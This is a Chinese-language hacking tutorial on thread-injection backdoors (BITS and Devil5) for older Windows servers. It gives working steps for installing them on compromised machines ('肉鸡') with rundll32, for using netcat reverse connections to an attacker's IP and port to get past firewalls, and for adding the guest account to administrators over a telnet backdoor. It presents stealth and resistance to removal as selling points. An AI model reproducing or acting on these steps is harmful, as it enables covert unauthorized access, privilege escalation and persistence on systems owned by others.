线程插入后门其特点就在于插入二字,这种后门在运行的时候并没有自己的独立进程,而是插入到其他进程中,这样即便是安装了防火墙的企业和用户,也不能对这样的后门进行有效的防御,这种后门是现在非常主流的一种,很让防护的人头疼,因为对它的查杀比较困难,这种后门本身的功能比较强大。
这类的典范就是国内提倡网络共享的小榕的BITS了,从它的推出以来,各类安全工具下载园地里BITS就高居榜首,非常多的朋友使用它的过程中感到了方便。
BITS
类型:系统后门
使用范围:wind200/xp/2003
隐蔽程序:★★★★☆
使用难度:★★★☆☆
危害程序:★★★★☆
查杀难度:★★★★☆
BITS其实是Background Intelligent Transfer Servicer的缩写,可以在不知不觉中实现另一种意义的典型的线程插入后门,有以下特点:进程管理器中看不到;平时没有端口,只是在系统中充当卧底的角色;提供正向连接和反向连接两种功能;仅适合用于windows 200/xp/2003。
运用举例
首先我们用3389登录上肉鸡,确定你有SYSTEM的权限,将BITS.DLL拷贝到服务器上,执行CMD命令:
rundll32.exe bits.dll,install
这样就激活了BIST,程序用这个特征的字符来辨认使用者,也就相当于你的密码了,然后卸载:rundll32.exe BITS.dll,Uninstall
这是最简单的使用,这个后门除了隐蔽性好外,还有两大特点是非常 值得借鉴的:端口复用和正反向连接。虽然很多朋友经常听到这两个名词,但并不了解它们,端口复用就是利用系统正常的TCP端口通讯和控制,比如80、139等,这样的后门有个非常 大的好处就是非常 隐蔽,不用自己开端口也不会暴露自己的访问,因为通讯本身就是系统的正常访问!另一个是反向连接,这个很常 见,也是后门中一个经典思路,因为从服务器上主动方问外边是不被禁止的,很多很历害的防火墙就怕这点!
BITS的正向连接很简单,大家可以参考它的README,这种方式在服务器没有防火墙等措施的时候很管用,可以方便地连接,但是遇到有防火墙这样的方式就不灵了,得使用下面的反向连接方式:
在本地使用NC监听(如:nc -l -p 1234)
用NC连接目标主机的任何一个防火墙允许的TCP端口(80/139/445……)
输入激活命令:[email=hkfx@dancewithdolphin[rxell]:1.1.1.1:2222]hkfx@dancewithdolphin[rxell]:1.1.1.1:2222[/email]
目标主机的CMD将会出现NC监听的端口2222,这样就实现了绕过防火墙的功能了。
devil5(魔鬼5号)
类型:系统后门
使用范围:win200/xp/2003
隐蔽程度:★★★★☆
使用难度:★★☆☆☆
危害程序:★★★★☆
查杀难度:★★★☆☆
同BITS一样,Devil5也是线程插入式的后门,和BITS不同的是它可以很方便的在GUI界面下按照自己的使用习惯定制端口和需要插入的线程,适合对系统有一定了解的使用都使用,由于是自定义插入线程,所以它更难被查杀,下面我们来看看它的使用。
运用举例:
道德使用它自带的配置程序EDITDEVIL5.EXE对后门进行常规的配置,包括控制端口、插入线程、连接密码、时间间隔等方面关键点是对插入线程的定制,一般设置成系统自带的SVCHOST,然后运行后门就可以控制了。
我们用TELNET连接上去,连接的格式是:TELNET *** 定制的端口,它和其他后门不同之处在于连接后没有提示的界面,每次执行程序也是分开的,必须要每次都有输入密码,比如我们丢掉了服务器和管账户,可以激活GUEST后再将GUEST加到管理员权限,记得每次执行命令后加上“>密码”就可以了:net localgroup administrators guest /add >hkfx,然后你又可以控制服务器了。
很明显示,同榕哥的BITS相比,DEVIL5有一些缺陷:不能通过系统自带端口通讯、执行命令比较麻烦,需要每次输入密码而且不回显示输入内容,很容易出错。但是,它有自己的优势:插入线程可以自已定制,比如设置IE的线程为插入的目标就比较难被查杀:自己提供了专门的查杀工具DELDEVIL5.exe,帮助防护者清理系统;而且它可以任意改名和绑定,使用灵活性上比BITS强……大家选择哪能款就看自己的喜好了。
另外,PortLess BackDoor等工具也是此类的后门,功能强大,隐蔽性稍差,大家有兴趣可以自己研究一下。
【编辑推荐】
